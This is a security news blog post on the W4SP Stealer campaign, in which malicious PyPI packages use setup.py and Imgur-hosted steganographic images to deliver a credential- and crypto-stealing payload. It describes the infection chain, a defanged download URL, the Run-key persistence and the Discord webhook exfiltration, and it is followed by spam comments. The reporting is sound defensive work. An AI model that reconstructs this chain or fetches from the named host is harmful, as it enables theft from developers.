W4SP Stealer Actively Targeting Python Developers in Ongoing Supply Chain Attack

Checkmarx researchers uncovered an ongoing supply chain attack leveraging malicious Python packages to distribute malware tracked as WASP, with over hundreds victims infected to date.

“Our team was able to get inside the attacker’s “hall of fame,” we could see hundreds of successful infections.” Checkmarx researcher Jossef Harush said in a medium write-up, calling the adversary WASP. “The attack seems related to cybercrime as the attacker claims that these tools are undetectable to increase sales.”

What’s WASP Stealer

WASP stealer is a discord malware that steals all the accounts, passwords, crypto wallets, credit card numbers, and interesting files from the victim’s computer and sends them back to the attacker Discord Webhook.

The malware has persistency features that get enabled during startup on the infected pc. The creators claim that the WASP stealer is entirely undetectable and is “protected by some awesome obfuscation.”

It is selling for $20, where the payment is made with crypto or gift cards.

Checkmarx’s findings add to recent reports from Phylum and Check Point, which found 30 modules published on Python Package Index (PyPI) that were designed to spread malicious code while looking like harmless packages.

What makes it notable is the use of steganography to hide a polymorphic malware payload hidden within an image file hosted on Imgur.

WASP Stealer infection phase

Once a user installs the malicious package, the setup.py script is executed, and additional Python packages, notably judyb, which provides steganography utilities, are installed on the victim’s system.

Next, the setup.py script downloads a .png image from the Imgur address and saves it in the operating system’s temp directory. Then, the setup.py script uses the “lsb.reveal” function of the judyb package, to extract a hidden code from the png image.

Visualization of the code hiding inside the image using Steganography

Once the code in the previous stage is executed, it fetches another piece of code from this URL “hxxp://misogyny[.]wtf/inject/UsRjS959Rqm4sPG4”.

After the installed code from the previous stage is executed, it fetches another piece of code from the URL “hxxp://misogyny[.]wtf/inject/UsRjS959Rqm4sPG4” and saves the file with a random name in the temp directory.

It then modifies the registry key — HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run so that the python code remains persistent during PC start-up.

The overall process ends with the W4SP Stealer (aka WASP Stealer) infection.

Checkmarx’s analysis further tracked down the attacker’s Discord server, which is run by a single user named “Alpha.#0001,” as well as the fake GitHub profiles that were made to trick developers into downloading the malware.

On November 15th, the threat actor was detected using a new PyPI login (“halt”) to post typosquatting libraries that used the StarJacking approach, in which a package is published with a URL that points to an already popular source code repository.

“The simple and lethal technique of fooling using by creating fake GitHub accounts and sharing poisoned snippets has proven to trick hundreds of users into this campaign.”

“The level of manipulation used by software supply chain attackers is increasing as attackers get increasingly more clever.” concludes the report.

The development also coincides with the publication of new guidelines by U.S. cybersecurity and intelligence agencies outlining the recommended practices customers can take to secure the software supply chain.

“Customer teams specify to and rely on vendors for providing key artifacts (e.g. SBOM) and mechanisms to verify the software product, its security properties, and attest to the SDLC security processes and procedures,” the guidance reads.

21 thoughts on “W4SP Stealer Actively Targeting Python Developers in Ongoing Supply Chain Attack”

  1. Im no longer certain the place you’re getting your info, but great topic. I needs to spend a while studying more or understanding more. Thanks for fantastic info I was looking for this info for my mission.

  2. The following time I read a blog, I hope that it doesnt disappoint me as a lot as this one. I imply, I know it was my option to read, but I truly thought youd have something attention-grabbing to say. All I hear is a bunch of whining about something that you possibly can repair in the event you werent too busy in search of attention.

  3. Hi there, i read your blog occasionally and i own a similar one and i was just curious if you get a lot of spam feedback? If so how do you protect against it, any plugin or anything you can recommend? I get so much lately it’s driving me insane so any support is very much appreciated.

  4. Hello my loved one! I want to say that this article is amazing, great written and include almost all significant infos. I’d like to look extra posts like this.

  5. I am not sure the place you are getting your info, but good topic. I needs to spend some time finding out more or working out more. Thank you for magnificent information I used to be looking for this information for my mission.

  6. Hello, Neat post. There’s a problem together with your web site in web explorer, would check this?K IE still is the marketplace chief and a large component of other people will miss your excellent writing due to this problem.

  7. I am curious to find out what blog system you’re using? I’m experiencing some minor security issues with my latest website and I would like to find something more safe. Do you have any suggestions?

  8. Pretty nice post. I just stumbled upon your weblog and wished to say that I have really enjoyed browsing your blog posts. In any case I’ll be subscribing to your feed and I hope you write again very soon!

  9. Hello! Would you mind if I share your blog with my facebook group? There’s a lot of folks that I think would really appreciate your content. Please let me know. Thanks

  10. After study a few of the blog posts on your website now, and I truly like your way of blogging. I bookmarked it to my bookmark website list and will be checking back soon. Pls check out my web site as well and let me know what you think.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top